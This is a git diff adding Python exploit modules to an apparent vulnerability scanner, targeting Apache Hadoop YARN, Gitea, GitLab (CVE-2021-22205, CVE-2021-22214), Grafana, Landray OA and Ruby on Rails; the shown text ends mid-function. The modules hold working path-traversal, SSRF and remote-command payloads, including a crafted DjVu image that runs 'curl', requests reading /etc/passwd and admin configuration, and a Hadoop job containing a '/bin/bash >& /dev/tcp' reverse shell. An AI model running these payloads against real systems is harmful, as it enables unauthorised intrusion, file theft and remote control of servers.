+ self.apache_hadoop_unauthorized_payloads = [
+ {
+ 'path': 'ws/v1/cluster/apps/new-application',
+ 'data': ''
+ },
+ # {
+ # 'path': 'ws/v1/cluster/apps',
+ # 'data': {
+ # 'application-id': '',
+ # 'application-name': 'mouse',
+ # 'am-container-spec': {
+ # 'commands': {
+ # 'command': 'curl DNSdomain', # * ping或curl无效, 放弃
+ # },
+ # },
+ # 'application-type': 'YARN',
+ # }
+ # },
+ {
+ 'path': 'ws/v1/cluster/apps',
+ 'data': {
+ 'application-id': '',
+ 'application-name': 'mouse',
+ 'am-container-spec': {
+ 'commands': {
+ 'command': '/bin/bash >& /dev/tcp/ip/port 0>&1',
+ },
+ },
+ 'application-type': 'YARN',
+ }
+ },
+ ]
+
+ def apache_hadoop_unauthorized_scan(self, url):
+ ''' YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作,
+ 如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令
+ '''
+ # sessid = '3861eb6b3d023d464efe85aa01277d27'
+
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'unAuthorized'
+ vul_info['vul_id'] = 'ApacheHadoop-unAuth'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {
+ 'Content-Type': 'application/json'
+ }
+
+ headers = self.headers.copy()
+ headers.update(vul_info['headers'])
+
+ for payload in range(len(self.apache_hadoop_unauthorized_payloads)):
+ # md = random_md5() # * 随机md5值, 8位
+ # dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名
+
+ path = self.apache_hadoop_unauthorized_payloads[payload]['path']
+ data = self.apache_hadoop_unauthorized_payloads[payload]['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ if (payload == 0): # * 获取application-id
+ res1 = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res1.status_code, res1) # * LOG
+
+ try:
+ if (res1.json()['application-id']):
+ self.application_id = res1.json()['application-id']
+ continue
+ except:
+ return None
+
+ # command = data['am-container-spec']['commands']['command']
+ # data['am-container-spec']['commands']['command'] = command.replace('DNSdomain', dns_domain)
+ data['application-id'] = self.application_id
+
+ res2 = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ json=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res2.status_code, res2) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (res2.status_code == 202):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res2
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.apache_hadoop_unauthorized_scan, url=url)
+ ]
+
+hadoop = ApacheHadoop()
diff --git a/payloads/Gitea.py b/payloads/Gitea.py
new file mode 100644
index 0000000..486b99a
--- /dev/null
+++ b/payloads/Gitea.py
@@ -0,0 +1,160 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Gitea是从gogs衍生出的一个开源项目, 是一个类似于Github、Gitlab的多用户Git仓库管理平台
+ Gitea扫描类:
+ Gitea 1.4.0 未授权访问, 综合漏洞(目录穿越, RCE等)
+ 暂无编号
+ Payload: https://vulhub.org/#/environments/gitea/1.4-rce/
+
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class Gitea():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Gitea'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.gitea_unauthorized_payloads = [
+ {
+ 'path': '.git/info/lfs/objects',
+ 'data': '''{
+ "Oid": "....../../../etc/passwd",
+ "Size": 1000000,
+ "User" : "a",
+ "Password" : "a",
+ "Repo" : "a",
+ "Authorization" : "a"
+}''',
+ 'headers': head.merge(self.headers, {
+ 'Content-Type': 'application/json',
+ 'Accept': 'application/vnd.git-lfs+json'
+ })
+ },
+ {
+ 'path': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2Fetc%2Fpasswd/a',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '.git/info/lfs/objects',
+ 'data': '''{
+ "Oid": "....../../../C:/Windows/System32/drivers/etc/hosts",
+ "Size": 1000000,
+ "User" : "a",
+ "Password" : "a",
+ "Repo" : "a",
+ "Authorization" : "a"
+}''',
+ 'headers': head.merge(self.headers, {
+ 'Content-Type': 'application/json',
+ 'Accept': 'application/vnd.git-lfs+json'
+ })
+ },
+ {
+ 'path': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2FC:%2FWindows%2FSystem32%2Fdrivers%2Fetc%2Fhosts/a',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ ]
+
+ def gitea_unauthorized_scan(self, url):
+ ''' 其1.4.0版本中有一处逻辑错误, 导致未授权用户可以穿越目录, 读写任意文件, 最终导致执行任意命令 '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'unAuthorized'
+ vul_info['vul_id'] = 'Gitea-unAuthorized'
+ vul_info['vul_method'] = 'POST/GET'
+
+ for payload in range(len(self.gitea_unauthorized_payloads)):
+ path = self.gitea_unauthorized_payloads[payload]['path']
+ data = self.gitea_unauthorized_payloads[payload]['data']
+ headers = self.gitea_unauthorized_payloads[payload]['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ if (payload in [0, 2]):
+ res1 = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res1.status_code, res1) # * LOG
+
+ if (res1.status_code in [202, 401]):
+ path = self.gitea_unauthorized_payloads[payload+1]['path']
+ headers = self.gitea_unauthorized_payloads[payload+1]['headers']
+ target = url + path
+
+ res2 = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res2.status_code, res2) # * LOG
+
+ if (('/sbin/nologin' in res2.text)
+ or ('root:x:0:0:root' in res2.text)
+ or ('Microsoft Corp' in res2.text)
+ or ('Microsoft TCP/IP for Windows' in res2.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request-1': res1,
+ 'Request-2': res2
+ }
+ return results
+ else:
+ continue
+
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.gitea_unauthorized_scan, url=url)
+ ]
+
+gitea = Gitea()
diff --git a/payloads/Gitlab.py b/payloads/Gitlab.py
new file mode 100644
index 0000000..35d5fb0
--- /dev/null
+++ b/payloads/Gitlab.py
@@ -0,0 +1,235 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+
+ Gitlab扫描类:
+ 1. GitLab Pre-Auth 远程命令执行
+ CVE-2021-22205
+ Payload: https://vulhub.org/#/environments/gitlab/CVE-2021-22205/
+ 反弹shell: https://blog.csdn.net/weixin_46137328/article/details/121551162
+
+ 2. Gitlab CI Lint API未授权 SSRF
+ CVE-2021-22214
+ Payload: https://cloud.tencent.com/developer/article/1851527
+
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+file:///C:/Windows/System32/drivers/etc/hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+import re
+
+class Gitlab():
+ def __init__(self):
+ self.session = requests.session()
+
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Gitlab'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2021_22205_payloads = [
+ {
+ 'path': 'users/sign_in',
+ 'data': ''
+ },
+ {
+ 'path': 'uploads/user',
+ 'data': ''
+ },
+ {
+ 'path': 'sign_in',
+ 'data': ''
+ },
+ {
+ 'path': 'user',
+ 'data': ''
+ }
+ ]
+
+ self.cve_2021_22214_payloads = [
+ {
+ 'path': 'api/v4/ci/lint',
+ 'data': '{ "include_merged_yaml": true, "content": "include:\\n remote: http://DNSdomain/api/v1/targets/?test.yml"}'
+ },
+ ]
+
+ def cve_2021_22205_scan(self, url):
+ ''' 在 GitLab CE/EE中发现了一个从11.9版本开始的问题,
+ GitLab未正确验证传递给文件解析器的图像文件, 从而导致未经身份验证的远程命令执行
+ '''
+ sessid = '597d45eba94e6e1651ae4fe7bf3b062e'
+
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2021-22205'
+ vul_info['vul_method'] = 'GET/POST'
+ vul_info['headers'] = {}
+
+ headers = self.headers.copy()
+ headers.update(vul_info['headers'])
+
+ for payload in range(len(self.cve_2021_22205_payloads)):
+ md = random_md5() # * 随机md5值, 8位
+ dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名
+ dns_command = 'curl ' + dns_domain
+
+ path = self.cve_2021_22205_payloads[payload]['path']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['target'] = target
+
+ try:
+ if (payload in [0, 2]):
+ res1 = self.session.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res1.status_code, res1) # * LOG
+
+ csrf_token_re = re.search(r'name="csrf-token" content=".*"', res1.text, re.I|re.M|re.U)
+
+ if csrf_token_re:
+ csrf_token = csrf_token_re.group(0)
+ csrf_token = csrf_token.rstrip('"').replace('name="csrf-token" content="', '')
+ headers.update({'X-CSRF-Token': csrf_token})
+ del headers['Content-Type']
+
+ path = self.cve_2021_22205_payloads[payload+1]['path']
+ target = url + path
+
+ data = b'\x41\x54\x26\x54\x46\x4f\x52\x4d' + \
+ (len(dns_command) + 0x55).to_bytes(length=4, byteorder='big', signed=True) + \
+ b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61' + \
+ (len(dns_command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True) + \
+ b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b' + \
+ dns_command.encode() + \
+ b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a'
+
+ files = [('file', ('test.jpg', data, 'image/jpeg'))]
+
+ res2 = self.session.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ files=files,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res2.status_code, res2) # * LOG
+ if (md in dns.result(md, sessid)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Exp': 'https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/poc.py',
+ 'Request-1(csrf-token)': res1,
+ 'Request-2': res2
+ }
+ return results
+ else:
+ continue
+ else:
+ continue
+
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+
+ def cve_2021_22214_scan(self, url):
+ ''' Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式,
+ 其include操作支持remote选项, 用于获取远端的yaml, 因此在此处将remote参数设置为本地回环地址,
+ 同时由于后端会检查最后扩展名, 加上?test.yaml 即可绕过
+ '''
+ sessid = '35c4b2b338754840369c3b20a2847f0a'
+
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'SSRF'
+ vul_info['vul_id'] = 'CVE-2021-22214'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {
+ 'Content-Type': 'application/json'
+ }
+
+ headers = self.headers.copy()
+ headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_22214_payloads:
+ md = random_md5() # * 随机md5值, 8位
+ dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名
+
+ path = payload['path']
+ data = payload['data'].replace('DNSdomain', dns_domain)
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (md in dns.result(md, sessid)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2021_22205_scan, url=url),
+ thread(target=self.cve_2021_22214_scan, url=url)
+ ]
+
+gitlab = Gitlab()
diff --git a/payloads/Grafana.py b/payloads/Grafana.py
new file mode 100644
index 0000000..face33b
--- /dev/null
+++ b/payloads/Grafana.py
@@ -0,0 +1,148 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+''' # ! 由于该POC数据包过多, 只有在指纹识别为Grafana时才会进行扫描, 否则vulcat不会使用该POC
+
+ Grafana扫描类:
+ Grafana 8.x 插件模块文件路径遍历
+ CVE-2021-43798
+ Payload: https://vulhub.org/#/environments/grafana/CVE-2021-43798/
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+
+class Grafana():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Grafana'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2021_43798_payloads = [
+ {
+ 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts',
+ 'data': ''
+ },
+ {
+ 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts',
+ 'data': ''
+ },
+ # {
+ # 'path': 'plugins/{}/../../../../../../../../../../../../../etc/passwd',
+ # 'data': ''
+ # },
+ # {
+ # 'path': '{}/../../../../../../../../../../../../../etc/passwd',
+ # 'data': ''
+ # },
+ ]
+ # * 该漏洞是由插件模块引起的, 以下是一些常见的插件id
+ self.cve_2021_43798_plugins = [
+ 'alertlist',
+ 'cloudwatch',
+ 'dashlist',
+ 'elasticsearch',
+ 'graph',
+ 'graphite',
+ 'heatmap',
+ 'influxdb',
+ 'mysql',
+ 'opentsdb',
+ 'pluginlist',
+ 'postgres',
+ 'prometheus',
+ 'stackdriver',
+ 'table',
+ 'text'
+ ]
+
+ def cve_2021_43798_scan(self, url):
+ ''' 2021年12月, 一位Twitter用户披露了一个0day漏洞,
+ 未经身份验证的攻击者可以利用该漏洞通过 Grafana 8.x 的插件url来遍历web路径并下载任意文件
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'File-Read'
+ vul_info['vul_id'] = 'CVE-2021-43798'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_43798_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ for plugins in self.cve_2021_43798_plugins:
+ sleep(0.5) # * 防止扫描过快
+
+ res = requests.get(
+ target.format(plugins),
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': res.request.url,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': res.request.path_url,
+ },
+ 'Request': res
+ }
+ return results
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2021_43798_scan, url=url)
+ ]
+
+grafana = Grafana()
diff --git a/payloads/Landray.py b/payloads/Landray.py
new file mode 100644
index 0000000..71395d1
--- /dev/null
+++ b/payloads/Landray.py
@@ -0,0 +1,134 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+蓝凌是国内数字化办公专业服务商
+ 蓝凌OA扫描类:
+ 蓝凌OA custom.jsp任意文件读取(SSRF)
+ CNVD-2021-28277
+
+
+file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+
+class Landray():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Landray-OA'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cnvd_2021_28277_payloads = [
+ {
+ 'path': 'sys/ui/extend/varkind/custom.jsp',
+ 'data': 'var={"body":{"file":"file:///etc/passwd"}}'
+ },
+ {
+ 'path': 'sys/ui/extend/varkind/custom.jsp',
+ 'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
+ },
+ {
+ 'path': 'sys/ui/extend/varkind/custom.jsp',
+ 'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
+ },
+ {
+ 'path': 'sys/ui/extend/varkind/custom.jsp',
+ 'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
+ },
+ {
+ 'path': 'custom.jsp',
+ 'data': 'var={"body":{"file":"file:///etc/passwd"}}'
+ },
+ {
+ 'path': 'custom.jsp',
+ 'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
+ },
+ {
+ 'path': 'custom.jsp',
+ 'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
+ },
+ {
+ 'path': 'custom.jsp',
+ 'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
+ },
+ ]
+
+ def cnvd_2021_28277_scan(self, url):
+ ''' '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'SSRF'
+ vul_info['vul_id'] = 'CNVD-2021-28277'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cnvd_2021_28277_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ or (('password' in res.text) and ('kmss.properties.encrypt.enabled = true' in res.text))
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res,
+ # 'Default SceretKey': 'kmssAdminKey'
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cnvd_2021_28277_scan, url=url)
+ ]
+
+landray = Landray()
diff --git a/payloads/RubyOnRails.py b/payloads/RubyOnRails.py
new file mode 100644
index 0000000..d85a93c
--- /dev/null
+++ b/payloads/RubyOnRails.py
@@ -0,0 +1,320 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Ruby On Rails 是著名的Ruby Web开发框架
+ Ruby on Rails扫描类:
+ 1. Ruby on Rails 路径遍历
+ CVE-2018-3760
+ Payload: https://vulhub.org/#/environments/rails/CVE-2018-3760/
+
+ 2. Ruby on Rails 路径穿越与任意文件读取
+ CVE-2019-5418
+ Payload: https://vulhub.org/#/environments/rails/CVE-2019-5418/
+
+ 3. Ruby on Rails 命令执行
+ CVE-2020-8163
+ Payload: https://github.com/h4ms1k/CVE-2020-8163/
+
+file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from json import load
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+import re
+
+class RubyOnRails():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Ruby on Rails'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2018_3760_payloads = [
+ {
+ 'path': 'assets/file:%2f%2f/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': 'assets/file:%2f%2f/C:/Windows/System32/drivers/etc/hosts',
+ 'data': ''
+ },
+ {
+ 'path': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts',
+ 'data': ''
+ },
+ {
+ 'path': 'file:%2f%2f/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': 'file:%2f%2f/C:/Windows/System32/drivers/etc/hosts',
+ 'data': ''
+ },
+ {
+ 'path': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts',
+ 'data': ''
+ }
+ ]
+
+ self.cve_2019_5418_payloads = [
+ {
+ 'path': '',
+ 'data': '',
+ 'headers': head.merge(self.headers, {
+ 'Accept': '../../../../../../../../etc/passwd{{'
+ })
+ },
+ {
+ 'path': '',
+ 'data': '',
+ 'headers': head.merge(self.headers, {
+ 'Accept': '../../../../../../../../C:/Windows/System32/drivers/etc/hosts{{'
+ })
+ },
+ {
+ 'path': '',
+ 'data': '',
+ 'headers': head.merge(self.headers, {
+ 'Accept': '../../../../../../../../C:\Windows\System32\drivers\etc\hosts{{'
+ })
+ }
+ ]
+
+ self.cve_2020_8163_payloads = [
+ {
+ 'path': '?[system("curl DNSdomain")end%00]',
+ 'data': ''
+ },
+ {
+ 'path': '?[system("ping -c 4 DNSdomain")end%00]',
+ 'data': ''
+ },
+ {
+ 'path': '?[system("ping DNSdomain")end%00]',
+ 'data': ''
+ }
+ ]
+
+ def cve_2018_3760_scan(self, url):
+ ''' 在开发环境中使用 Sprockets 作为静态文件服务器
+ Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞, 攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'File-Read'
+ vul_info['vul_id'] = 'CVE-2018-3760'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in range(len(self.cve_2018_3760_payloads)):
+ path = self.cve_2018_3760_payloads[payload]['path']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['target'] = target
+
+ load_path_re = r'<h2>.* is no longer under a load path: .*/.{0,30}</h2>'
+
+ try:
+ if (payload % 2 == 0):
+ res1 = requests.get( # * 获取允许的路径(路径白名单)
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res1.status_code, res1) # * LOG
+
+ load_path_search = re.search(load_path_re, res1.text, re.I|re.M|re.U|re.S)
+ if load_path_search:
+ path = self.cve_2018_3760_payloads[payload+1]['path']
+
+ load_path_s = load_path_search.group(0).lstrip('<h2>').rstrip('</h2>')
+ load_path_s = load_path_s.replace('/etc/passwd is no longer under a load path: ', '')
+ load_path_s = load_path_s.replace('C:/Windows/System32/drivers/etc/hosts is no longer under a load path: ', '')
+ load_path_list = load_path_s.split(', ')
+
+ for load_path in load_path_list:
+ sleep(0.5)
+ target = url + path.format(load_path)
+
+ res2 = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res2.status_code, res2) # * LOG
+
+ if (('/sbin/nologin' in res2.text)
+ or ('root:x:0:0:root' in res2.text)
+ or ('Microsoft Corp' in res2.text)
+ or ('Microsoft TCP/IP for Windows' in res2.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res2
+ }
+ return results
+ else:
+ continue
+ else:
+ continue
+
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ def cve_2019_5418_scan(self, url):
+ ''' 在控制器中通过render file形式来渲染应用之外的视图, 且会根据用户传入的Accept头来确定文件具体位置
+ 通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞, 读取任意文件
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
